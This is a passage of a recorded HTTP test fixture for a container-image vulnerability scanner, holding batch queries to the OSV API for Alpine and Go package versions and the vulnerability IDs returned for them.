"3.6.5-r0" }, { "package": { "ecosystem": "Alpine:v3.20", "name": "alpine-keys" }, "version": "2.4-r1" }, { "package": { "ecosystem": "Alpine:v3.20", "name": "apk-tools" }, "version": "2.14.4-r0" }, { "package": { "ecosystem": "Alpine:v3.20", "name": "busybox" }, "version": "1.36.1-r29" }, { "package": { "ecosystem": "Alpine:v3.20", "name": "busybox" }, "version": "1.36.1-r29" }, { "package": { "ecosystem": "Alpine:v3.20", "name": "ca-certificates" }, "version": "20240226-r0" }, { "package": { "ecosystem": "Go", "name": "github.com/BurntSushi/toml" }, "version": "1.2.0" }, { "package": { "ecosystem": "Go", "name": "github.com/BurntSushi/toml" }, "version": "1.2.0" }, { "package": { "ecosystem": "Go", "name": "github.com/BurntSushi/toml" }, "version": "1.3.0" }, { "package": { "ecosystem": "Go", "name": "github.com/BurntSushi/toml" }, "version": "1.3.0" }, { "package": { "ecosystem": "Go", "name": "github.com/BurntSushi/toml" }, "version": "1.4.0" }, { "package": { "ecosystem": "Go", "name": "github.com/BurntSushi/toml" }, "version": "1.4.0" }, { "package": { "ecosystem": "Go", "name": "stdlib" }, "version": "1.22.4" }, { "package": { "ecosystem": "Go", "name": "stdlib" }, "version": "1.22.4" }, { "package": { "ecosystem": "Go", "name": "stdlib" }, "version": "1.22.4" }, { "package": { "ecosystem": "Go", "name": "stdlib" }, "version": "1.22.4" }, { "package": { "ecosystem": "Go", "name": "stdlib" }, "version": "1.22.4" }, { "package": { "ecosystem": "Go", "name": "stdlib" }, "version": "1.22.4" }, { "package": { "ecosystem": "Alpine:v3.20", "name": "openssl" }, "version": "3.3.1-r0" }, { "package": { "ecosystem": "Alpine:v3.20", "name": "openssl" }, "version": "3.3.1-r0" }, { "package": { "ecosystem": "Alpine:v3.20", "name": "musl" }, "version": "1.2.5-r0" }, { "package": { "ecosystem": "Alpine:v3.20", "name": "musl" }, "version": "1.2.5-r0" }, { "package": { "ecosystem": "Go", "name": "ptf" }, "version": "(devel)" }, { "package": { "ecosystem": "Go", "name": "ptf" 
}, "version": "(devel)" }, { "package": { "ecosystem": "Go", "name": "ptf" }, "version": "(devel)" }, { "package": { "ecosystem": "Go", "name": "ptf" }, "version": "(devel)" }, { "package": { "ecosystem": "Go", "name": "ptf" }, "version": "(devel)" }, { "package": { "ecosystem": "Go", "name": "ptf" }, "version": "(devel)" }, { "package": { "ecosystem": "Alpine:v3.20", "name": "pax-utils" }, "version": "1.3.7-r2" }, { "package": { "ecosystem": "Alpine:v3.20", "name": "busybox" }, "version": "1.36.1-r29" }, { "package": { "ecosystem": "Alpine:v3.20", "name": "zlib" }, "version": "1.3.1-r1" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_OCIImage/scanning_image_with_go_binary url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 15478 body: | { "results": [ {}, {}, {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2024-58251", "modified": "2025-12-03T22:57:45.619122Z" }, { "id": "ALPINE-CVE-2025-46394", "modified": "2025-12-03T22:59:20.065296Z" } ] }, { "vulns": [ { "id": "ALPINE-CVE-2024-58251", "modified": "2025-12-03T22:57:45.619122Z" }, { "id": "ALPINE-CVE-2025-46394", "modified": "2025-12-03T22:59:20.065296Z" } ] }, {}, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "GO-2024-2963", "modified": "2026-02-04T03:37:39.895574Z" }, { "id": "GO-2024-3105", "modified": "2026-02-24T16:29:04.364011Z" }, { "id": "GO-2024-3106", "modified": "2026-02-24T16:29:04.606789Z" }, { "id": "GO-2024-3107", "modified": "2026-02-24T16:29:04.677030Z" }, { "id": "GO-2025-3373", "modified": "2026-02-17T16:13:53.362266Z" }, { "id": "GO-2025-3420", "modified": "2026-02-17T16:13:53.083304Z" }, { "id": "GO-2025-3447", "modified": "2026-02-04T04:23:04.020664Z" }, { "id": "GO-2025-3563", "modified": "2026-02-17T16:13:52.395126Z" }, { "id": "GO-2025-3750", "modified": "2026-02-04T03:28:12.135241Z" }, { "id": "GO-2025-3751", "modified": "2026-02-17T16:13:52.185280Z" }, { "id": "GO-2025-3849", "modified": 
"2026-02-04T02:26:50.866679Z" }, { "id": "GO-2025-3956", "modified": "2026-02-04T04:33:27.340869Z" }, { "id": "GO-2025-4006", "modified": "2026-02-17T16:13:53.018755Z" }, { "id": "GO-2025-4007", "modified": "2026-02-17T13:58:48.676604Z" }, { "id": "GO-2025-4008", "modified": "2026-02-17T13:58:48.077685Z" }, { "id": "GO-2025-4009", "modified": "2026-02-13T02:58:48.571208Z" }, { "id": "GO-2025-4010", "modified": "2026-02-13T21:28:48.362505Z" }, { "id": "GO-2025-4011", "modified": "2026-02-17T13:58:47.352598Z" }, { "id": "GO-2025-4012", "modified": "2026-02-17T13:58:47.721658Z" }, { "id": "GO-2025-4013", "modified": "2026-02-17T13:58:47.501939Z" }, { "id": "GO-2025-4014", "modified": "2026-03-18T11:44:08.816200Z" }, { "id": "GO-2025-4015", "modified": "2026-02-17T16:13:53.510662Z" }, { "id": "GO-2025-4155", "modified": "2026-03-18T11:44:08.473909Z" }, { "id": "GO-2025-4175", "modified": "2026-02-04T04:38:59.126121Z" }, { "id": "GO-2026-4337", "modified": "2026-03-18T11:44:08.657377Z" }, { "id": "GO-2026-4340", "modified": "2026-02-04T02:58:11.702669Z" }, { "id": "GO-2026-4341", "modified": "2026-03-18T11:44:08.749079Z" }, { "id": "GO-2026-4342", "modified": "2026-03-17T10:28:56.226379Z" }, { "id": "GO-2026-4403", "modified": "2026-02-06T09:40:56.765821Z" }, { "id": "GO-2026-4601", "modified": "2026-03-10T10:43:54.660319Z" }, { "id": "GO-2026-4602", "modified": "2026-03-10T10:43:54.463365Z" }, { "id": "GO-2026-4603", "modified": "2026-03-10T10:43:54.330461Z" } ] }, { "vulns": [ { "id": "GO-2024-2963", "modified": "2026-02-04T03:37:39.895574Z" }, { "id": "GO-2024-3105", "modified": "2026-02-24T16:29:04.364011Z" }, { "id": "GO-2024-3106", "modified": "2026-02-24T16:29:04.606789Z" }, { "id": "GO-2024-3107", "modified": "2026-02-24T16:29:04.677030Z" }, { "id": "GO-2025-3373", "modified": "2026-02-17T16:13:53.362266Z" }, { "id": "GO-2025-3420", "modified": "2026-02-17T16:13:53.083304Z" }, { "id": "GO-2025-3447", "modified": "2026-02-04T04:23:04.020664Z" }, { "id": 
"GO-2025-3563", "modified": "2026-02-17T16:13:52.395126Z" }, { "id": "GO-2025-3750", "modified": "2026-02-04T03:28:12.135241Z" }, { "id": "GO-2025-3751", "modified": "2026-02-17T16:13:52.185280Z" }, { "id": "GO-2025-3849", "modified": "2026-02-04T02:26:50.866679Z" }, { "id": "GO-2025-3956", "modified": "2026-02-04T04:33:27.340869Z" }, { "id": "GO-2025-4006", "modified": "2026-02-17T16:13:53.018755Z" }, { "id": "GO-2025-4007", "modified": "2026-02-17T13:58:48.676604Z" }, { "id": "GO-2025-4008", "modified": "2026-02-17T13:58:48.077685Z" }, { "id": "GO-2025-4009", "modified": "2026-02-13T02:58:48.571208Z" }, { "id": "GO-2025-4010", "modified": "2026-02-13T21:28:48.362505Z" }, { "id": "GO-2025-4011", "modified": "2026-02-17T13:58:47.352598Z" }, { "id": "GO-2025-4012", "modified": "2026-02-17T13:58:47.721658Z" }, { "id": "GO-2025-4013", "modified": "2026-02-17T13:58:47.501939Z" }, { "id": "GO-2025-4014", "modified": "2026-03-18T11:44:08.816200Z" }, { "id": "GO-2025-4015", "modified": "2026-02-17T16:13:53.510662Z" }, { "id": "GO-2025-4155", "modified": "2026-03-18T11:44:08.473909Z" }, { "id": "GO-2025-4175", "modified": "2026-02-04T04:38:59.126121Z" }, { "id": "GO-2026-4337", "modified": "2026-03-18T11:44:08.657377Z" }, { "id": "GO-2026-4340", "modified": "2026-02-04T02:58:11.702669Z" }, { "id": "GO-2026-4341", "modified": "2026-03-18T11:44:08.749079Z" }, { "id": "GO-2026-4342", "modified": "2026-03-17T10:28:56.226379Z" }, { "id": "GO-2026-4403", "modified": "2026-02-06T09:40:56.765821Z" }, { "id": "GO-2026-4601", "modified": "2026-03-10T10:43:54.660319Z" }, { "id": "GO-2026-4602", "modified": "2026-03-10T10:43:54.463365Z" }, { "id": "GO-2026-4603", "modified": "2026-03-10T10:43:54.330461Z" } ] }, { "vulns": [ { "id": "GO-2024-2963", "modified": "2026-02-04T03:37:39.895574Z" }, { "id": "GO-2024-3105", "modified": "2026-02-24T16:29:04.364011Z" }, { "id": "GO-2024-3106", "modified": "2026-02-24T16:29:04.606789Z" }, { "id": "GO-2024-3107", "modified": 
"2026-02-24T16:29:04.677030Z" }, { "id": "GO-2025-3373", "modified": "2026-02-17T16:13:53.362266Z" }, { "id": "GO-2025-3420", "modified": "2026-02-17T16:13:53.083304Z" }, { "id": "GO-2025-3447", "modified": "2026-02-04T04:23:04.020664Z" }, { "id": "GO-2025-3563", "modified": "2026-02-17T16:13:52.395126Z" }, { "id": "GO-2025-3750", "modified": "2026-02-04T03:28:12.135241Z" }, { "id": "GO-2025-3751", "modified": "2026-02-17T16:13:52.185280Z" }, { "id": "GO-2025-3849", "modified": "2026-02-04T02:26:50.866679Z" }, { "id": "GO-2025-3956", "modified": "2026-02-04T04:33:27.340869Z" }, { "id": "GO-2025-4006", "modified": "2026-02-17T16:13:53.018755Z" }, { "id": "GO-2025-4007", "modified": "2026-02-17T13:58:48.676604Z" }, { "id": "GO-2025-4008", "modified": "2026-02-17T13:58:48.077685Z" }, { "id": "GO-2025-4009", "modified": "2026-02-13T02:58:48.571208Z" }, { "id": "GO-2025-4010", "modified": "2026-02-13T21:28:48.362505Z" }, { "id": "GO-2025-4011", "modified": "2026-02-17T13:58:47.352598Z" }, { "id": "GO-2025-4012", "modified": "2026-02-17T13:58:47.721658Z" }, { "id": "GO-2025-4013", "modified": "2026-02-17T13:58:47.501939Z" }, { "id": "GO-2025-4014", "modified": "2026-03-18T11:44:08.816200Z" }, { "id": "GO-2025-4015", "modified": "2026-02-17T16:13:53.510662Z" }, { "id": "GO-2025-4155", "modified": "2026-03-18T11:44:08.473909Z" }, { "id": "GO-2025-4175", "modified": "2026-02-04T04:38:59.126121Z" }, { "id": "GO-2026-4337", "modified": "2026-03-18T11:44:08.657377Z" }, { "id": "GO-2026-4340", "modified": "2026-02-04T02:58:11.702669Z" }, { "id": "GO-2026-4341", "modified": "2026-03-18T11:44:08.749079Z" }, { "id": "GO-2026-4342", "modified": "2026-03-17T10:28:56.226379Z" }, { "id": "GO-2026-4403", "modified": "2026-02-06T09:40:56.765821Z" }, { "id": "GO-2026-4601", "modified": "2026-03-10T10:43:54.660319Z" }, { "id": "GO-2026-4602", "modified": "2026-03-10T10:43:54.463365Z" }, { "id": "GO-2026-4603", "modified": "2026-03-10T10:43:54.330461Z" } ] }, { "vulns": [ { "id": 
"GO-2024-2963", "modified": "2026-02-04T03:37:39.895574Z" }, { "id": "GO-2024-3105", "modified": "2026-02-24T16:29:04.364011Z" }, { "id": "GO-2024-3106", "modified": "2026-02-24T16:29:04.606789Z" }, { "id": "GO-2024-3107", "modified": "2026-02-24T16:29:04.677030Z" }, { "id": "GO-2025-3373", "modified": "2026-02-17T16:13:53.362266Z" }, { "id": "GO-2025-3420", "modified": "2026-02-17T16:13:53.083304Z" }, { "id": "GO-2025-3447", "modified": "2026-02-04T04:23:04.020664Z" }, { "id": "GO-2025-3563", "modified": "2026-02-17T16:13:52.395126Z" }, { "id": "GO-2025-3750", "modified": "2026-02-04T03:28:12.135241Z" }, { "id": "GO-2025-3751", "modified": "2026-02-17T16:13:52.185280Z" }, { "id": "GO-2025-3849", "modified": "2026-02-04T02:26:50.866679Z" }, { "id": "GO-2025-3956", "modified": "2026-02-04T04:33:27.340869Z" }, { "id": "GO-2025-4006", "modified": "2026-02-17T16:13:53.018755Z" }, { "id": "GO-2025-4007", "modified": "2026-02-17T13:58:48.676604Z" }, { "id": "GO-2025-4008", "modified": "2026-02-17T13:58:48.077685Z" }, { "id": "GO-2025-4009", "modified": "2026-02-13T02:58:48.571208Z" }, { "id": "GO-2025-4010", "modified": "2026-02-13T21:28:48.362505Z" }, { "id": "GO-2025-4011", "modified": "2026-02-17T13:58:47.352598Z" }, { "id": "GO-2025-4012", "modified": "2026-02-17T13:58:47.721658Z" }, { "id": "GO-2025-4013", "modified": "2026-02-17T13:58:47.501939Z" }, { "id": "GO-2025-4014", "modified": "2026-03-18T11:44:08.816200Z" }, { "id": "GO-2025-4015", "modified": "2026-02-17T16:13:53.510662Z" }, { "id": "GO-2025-4155", "modified": "2026-03-18T11:44:08.473909Z" }, { "id": "GO-2025-4175", "modified": "2026-02-04T04:38:59.126121Z" }, { "id": "GO-2026-4337", "modified": "2026-03-18T11:44:08.657377Z" }, { "id": "GO-2026-4340", "modified": "2026-02-04T02:58:11.702669Z" }, { "id": "GO-2026-4341", "modified": "2026-03-18T11:44:08.749079Z" }, { "id": "GO-2026-4342", "modified": "2026-03-17T10:28:56.226379Z" }, { "id": "GO-2026-4403", "modified": "2026-02-06T09:40:56.765821Z" }, { 
"id": "GO-2026-4601", "modified": "2026-03-10T10:43:54.660319Z" }, { "id": "GO-2026-4602", "modified": "2026-03-10T10:43:54.463365Z" }, { "id": "GO-2026-4603", "modified": "2026-03-10T10:43:54.330461Z" } ] }, { "vulns": [ { "id": "GO-2024-2963", "modified": "2026-02-04T03:37:39.895574Z" }, { "id": "GO-2024-3105", "modified": "2026-02-24T16:29:04.364011Z" }, { "id": "GO-2024-3106", "modified": "2026-02-24T16:29:04.606789Z" }, { "id": "GO-2024-3107", "modified": "2026-02-24T16:29:04.677030Z" }, { "id": "GO-2025-3373", "modified": "2026-02-17T16:13:53.362266Z" }, { "id": "GO-2025-3420", "modified": "2026-02-17T16:13:53.083304Z" }, { "id": "GO-2025-3447", "modified": "2026-02-04T04:23:04.020664Z" }, { "id": "GO-2025-3563", "modified": "2026-02-17T16:13:52.395126Z" }, { "id": "GO-2025-3750", "modified": "2026-02-04T03:28:12.135241Z" }, { "id": "GO-2025-3751", "modified": "2026-02-17T16:13:52.185280Z" }, { "id": "GO-2025-3849", "modified": "2026-02-04T02:26:50.866679Z" }, { "id": "GO-2025-3956", "modified": "2026-02-04T04:33:27.340869Z" }, { "id": "GO-2025-4006", "modified": "2026-02-17T16:13:53.018755Z" }, { "id": "GO-2025-4007", "modified": "2026-02-17T13:58:48.676604Z" }, { "id": "GO-2025-4008", "modified": "2026-02-17T13:58:48.077685Z" }, { "id": "GO-2025-4009", "modified": "2026-02-13T02:58:48.571208Z" }, { "id": "GO-2025-4010", "modified": "2026-02-13T21:28:48.362505Z" }, { "id": "GO-2025-4011", "modified": "2026-02-17T13:58:47.352598Z" }, { "id": "GO-2025-4012", "modified": "2026-02-17T13:58:47.721658Z" }, { "id": "GO-2025-4013", "modified": "2026-02-17T13:58:47.501939Z" }, { "id": "GO-2025-4014", "modified": "2026-03-18T11:44:08.816200Z" }, { "id": "GO-2025-4015", "modified": "2026-02-17T16:13:53.510662Z" }, { "id": "GO-2025-4155", "modified": "2026-03-18T11:44:08.473909Z" }, { "id": "GO-2025-4175", "modified": "2026-02-04T04:38:59.126121Z" }, { "id": "GO-2026-4337", "modified": "2026-03-18T11:44:08.657377Z" }, { "id": "GO-2026-4340", "modified": 
"2026-02-04T02:58:11.702669Z" }, { "id": "GO-2026-4341", "modified": "2026-03-18T11:44:08.749079Z" }, { "id": "GO-2026-4342", "modified": "2026-03-17T10:28:56.226379Z" }, { "id": "GO-2026-4403", "modified": "2026-02-06T09:40:56.765821Z" }, { "id": "GO-2026-4601", "modified": "2026-03-10T10:43:54.660319Z" }, { "id": "GO-2026-4602", "modified": "2026-03-10T10:43:54.463365Z" }, { "id": "GO-2026-4603", "modified": "2026-03-10T10:43:54.330461Z" } ] }, { "vulns": [ { "id": "GO-2024-2963", "modified": "2026-02-04T03:37:39.895574Z" }, { "id": "GO-2024-3105", "modified": "2026-02-24T16:29:04.364011Z" }, { "id": "GO-2024-3106", "modified": "2026-02-24T16:29:04.606789Z" }, { "id": "GO-2024-3107", "modified": "2026-02-24T16:29:04.677030Z" }, { "id": "GO-2025-3373", "modified": "2026-02-17T16:13:53.362266Z" }, { "id": "GO-2025-3420", "modified": "2026-02-17T16:13:53.083304Z" }, { "id": "GO-2025-3447", "modified": "2026-02-04T04:23:04.020664Z" }, { "id": "GO-2025-3563", "modified": "2026-02-17T16:13:52.395126Z" }, { "id": "GO-2025-3750", "modified": "2026-02-04T03:28:12.135241Z" }, { "id": "GO-2025-3751", "modified": "2026-02-17T16:13:52.185280Z" }, { "id": "GO-2025-3849", "modified": "2026-02-04T02:26:50.866679Z" }, { "id": "GO-2025-3956", "modified": "2026-02-04T04:33:27.340869Z" }, { "id": "GO-2025-4006", "modified": "2026-02-17T16:13:53.018755Z" }, { "id": "GO-2025-4007", "modified": "2026-02-17T13:58:48.676604Z" }, { "id": "GO-2025-4008", "modified": "2026-02-17T13:58:48.077685Z" }, { "id": "GO-2025-4009", "modified": "2026-02-13T02:58:48.571208Z" }, { "id": "GO-2025-4010", "modified": "2026-02-13T21:28:48.362505Z" }, { "id": "GO-2025-4011", "modified": "2026-02-17T13:58:47.352598Z" }, { "id": "GO-2025-4012", "modified": "2026-02-17T13:58:47.721658Z" }, { "id": "GO-2025-4013", "modified": "2026-02-17T13:58:47.501939Z" }, { "id": "GO-2025-4014", "modified": "2026-03-18T11:44:08.816200Z" }, { "id": "GO-2025-4015", "modified": "2026-02-17T16:13:53.510662Z" }, { "id": 
"GO-2025-4155", "modified": "2026-03-18T11:44:08.473909Z" }, { "id": "GO-2025-4175", "modified": "2026-02-04T04:38:59.126121Z" }, { "id": "GO-2026-4337", "modified": "2026-03-18T11:44:08.657377Z" }, { "id": "GO-2026-4340", "modified": "2026-02-04T02:58:11.702669Z" }, { "id": "GO-2026-4341", "modified": "2026-03-18T11:44:08.749079Z" }, { "id": "GO-2026-4342", "modified": "2026-03-17T10:28:56.226379Z" }, { "id": "GO-2026-4403", "modified": "2026-02-06T09:40:56.765821Z" }, { "id": "GO-2026-4601", "modified": "2026-03-10T10:43:54.660319Z" }, { "id": "GO-2026-4602", "modified": "2026-03-10T10:43:54.463365Z" }, { "id": "GO-2026-4603", "modified": "2026-03-10T10:43:54.330461Z" } ] }, { "vulns": [ { "id": "ALPINE-CVE-2024-12797", "modified": "2025-12-03T22:55:03.634026Z" }, { "id": "ALPINE-CVE-2024-13176", "modified": "2026-02-08T14:17:02.498117Z" }, { "id": "ALPINE-CVE-2024-5535", "modified": "2025-12-03T22:57:32.699825Z" }, { "id": "ALPINE-CVE-2024-6119", "modified": "2025-12-03T22:57:47.097001Z" }, { "id": "ALPINE-CVE-2024-9143", "modified": "2025-12-03T22:57:50.413061Z" }, { "id": "ALPINE-CVE-2025-15467", "modified": "2026-02-26T11:16:44.405477Z" }, { "id": "ALPINE-CVE-2025-15468", "modified": "2026-01-30T11:17:10.087231Z" }, { "id": "ALPINE-CVE-2025-66199", "modified": "2026-01-30T11:16:38.617961Z" }, { "id": "ALPINE-CVE-2025-68160", "modified": "2026-02-08T14:17:20.369697Z" }, { "id": "ALPINE-CVE-2025-69418", "modified": "2026-02-08T14:17:22.909725Z" }, { "id": "ALPINE-CVE-2025-69419", "modified": "2026-02-08T14:17:23.481787Z" }, { "id": "ALPINE-CVE-2025-69420", "modified": "2026-02-08T14:17:16.244540Z" }, { "id": "ALPINE-CVE-2025-69421", "modified": "2026-02-08T14:17:06.852172Z" }, { "id": "ALPINE-CVE-2025-9230", "modified": "2026-02-08T14:17:13.655545Z" }, { "id": "ALPINE-CVE-2025-9231", "modified": "2025-12-03T23:00:26.184987Z" }, { "id": "ALPINE-CVE-2025-9232", "modified": "2026-02-08T14:17:23.776473Z" }, { "id": "ALPINE-CVE-2026-22795", "modified": 
"2026-02-08T14:17:23.817021Z" }, { "id": "ALPINE-CVE-2026-22796", "modified": "2026-02-08T14:17:23.708503Z" } ] }, { "vulns": [ { "id": "ALPINE-CVE-2024-12797", "modified": "2025-12-03T22:55:03.634026Z" }, { "id": "ALPINE-CVE-2024-13176", "modified": "2026-02-08T14:17:02.498117Z" }, { "id": "ALPINE-CVE-2024-5535", "modified": "2025-12-03T22:57:32.699825Z" }, { "id": "ALPINE-CVE-2024-6119", "modified": "2025-12-03T22:57:47.097001Z" }, { "id": "ALPINE-CVE-2024-9143", "modified": "2025-12-03T22:57:50.413061Z" }, { "id": "ALPINE-CVE-2025-15467", "modified": "2026-02-26T11:16:44.405477Z" }, { "id": "ALPINE-CVE-2025-15468", "modified": "2026-01-30T11:17:10.087231Z" }, { "id": "ALPINE-CVE-2025-66199", "modified": "2026-01-30T11:16:38.617961Z" }, { "id": "ALPINE-CVE-2025-68160", "modified": "2026-02-08T14:17:20.369697Z" }, { "id": "ALPINE-CVE-2025-69418", "modified": "2026-02-08T14:17:22.909725Z" }, { "id": "ALPINE-CVE-2025-69419", "modified": "2026-02-08T14:17:23.481787Z" }, { "id": "ALPINE-CVE-2025-69420", "modified": "2026-02-08T14:17:16.244540Z" }, { "id": "ALPINE-CVE-2025-69421", "modified": "2026-02-08T14:17:06.852172Z" }, { "id": "ALPINE-CVE-2025-9230", "modified": "2026-02-08T14:17:13.655545Z" }, { "id": "ALPINE-CVE-2025-9231", "modified": "2025-12-03T23:00:26.184987Z" }, { "id": "ALPINE-CVE-2025-9232", "modified": "2026-02-08T14:17:23.776473Z" }, { "id": "ALPINE-CVE-2026-22795", "modified": "2026-02-08T14:17:23.817021Z" }, { "id": "ALPINE-CVE-2026-22796", "modified": "2026-02-08T14:17:23.708503Z" } ] }, { "vulns": [ { "id": "ALPINE-CVE-2025-26519", "modified": "2025-12-11T11:16:21.978419Z" } ] }, { "vulns": [ { "id": "ALPINE-CVE-2025-26519", "modified": "2025-12-11T11:16:21.978419Z" } ] }, {}, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2024-58251", "modified": "2025-12-03T22:57:45.619122Z" }, { "id": "ALPINE-CVE-2025-46394", "modified": "2025-12-03T22:59:20.065296Z" } ] }, {} ] } headers: Content-Length: - "15478" Content-Type: - application/json 
status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 1907 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Alpine:v3.10", "name": "alpine-baselayout" }, "version": "3.1.2-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "alpine-keys" }, "version": "2.1-r2" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "apk-tools" }, "version": "2.10.6-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "busybox" }, "version": "1.30.1-r5" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "ca-certificates" }, "version": "20191127-r2" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "libc-dev" }, "version": "0.7.1-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "openssl" }, "version": "1.1.1k-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "openssl" }, "version": "1.1.1k-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "libtls-standalone" }, "version": "2.9.1-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "musl" }, "version": "1.1.22-r4" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "musl" }, "version": "1.1.22-r4" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "pax-utils" }, "version": "1.2.3-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "busybox" }, "version": "1.30.1-r5" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "zlib" }, "version": "1.2.11-r1" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_OCIImage/scanning_insecure_alpine_image_with_detector_preset url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 136 body: | { "results": [ {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2021-36159", "modified": "2025-12-03T22:50:23.251262Z" } ] }, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {} ] } headers: Content-Length: - "136" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - 
request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 1907 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Alpine:v3.10", "name": "alpine-baselayout" }, "version": "3.1.2-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "alpine-keys" }, "version": "2.1-r2" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "apk-tools" }, "version": "2.10.6-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "busybox" }, "version": "1.30.1-r5" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "ca-certificates" }, "version": "20191127-r2" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "libc-dev" }, "version": "0.7.1-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "openssl" }, "version": "1.1.1k-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "openssl" }, "version": "1.1.1k-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "libtls-standalone" }, "version": "2.9.1-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "musl" }, "version": "1.1.22-r4" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "musl" }, "version": "1.1.22-r4" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "pax-utils" }, "version": "1.2.3-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "busybox" }, "version": "1.30.1-r5" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "zlib" }, "version": "1.2.11-r1" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_OCIImage/scanning_insecure_alpine_image_with_specific_detector_disabled url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 136 body: | { "results": [ {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2021-36159", "modified": "2025-12-03T22:50:23.251262Z" } ] }, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {} ] } headers: Content-Length: - "136" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 
proto_major: 1 proto_minor: 1 content_length: 1907 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Alpine:v3.10", "name": "alpine-baselayout" }, "version": "3.1.2-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "alpine-keys" }, "version": "2.1-r2" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "apk-tools" }, "version": "2.10.6-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "busybox" }, "version": "1.30.1-r5" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "ca-certificates" }, "version": "20191127-r2" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "libc-dev" }, "version": "0.7.1-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "openssl" }, "version": "1.1.1k-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "openssl" }, "version": "1.1.1k-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "libtls-standalone" }, "version": "2.9.1-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "musl" }, "version": "1.1.22-r4" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "musl" }, "version": "1.1.22-r4" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "pax-utils" }, "version": "1.2.3-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "busybox" }, "version": "1.30.1-r5" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "zlib" }, "version": "1.2.11-r1" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_OCIImage/scanning_insecure_alpine_image_with_specific_detector_enabled url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 136 body: | { "results": [ {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2021-36159", "modified": "2025-12-03T22:50:23.251262Z" } ] }, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {} ] } headers: Content-Length: - "136" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 
content_length: 1907 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Alpine:v3.10", "name": "alpine-baselayout" }, "version": "3.1.2-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "alpine-keys" }, "version": "2.1-r2" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "apk-tools" }, "version": "2.10.6-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "busybox" }, "version": "1.30.1-r5" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "ca-certificates" }, "version": "20191127-r2" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "libc-dev" }, "version": "0.7.1-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "openssl" }, "version": "1.1.1k-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "openssl" }, "version": "1.1.1k-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "libtls-standalone" }, "version": "2.9.1-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "musl" }, "version": "1.1.22-r4" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "musl" }, "version": "1.1.22-r4" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "pax-utils" }, "version": "1.2.3-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "busybox" }, "version": "1.30.1-r5" }, { "package": { "ecosystem": 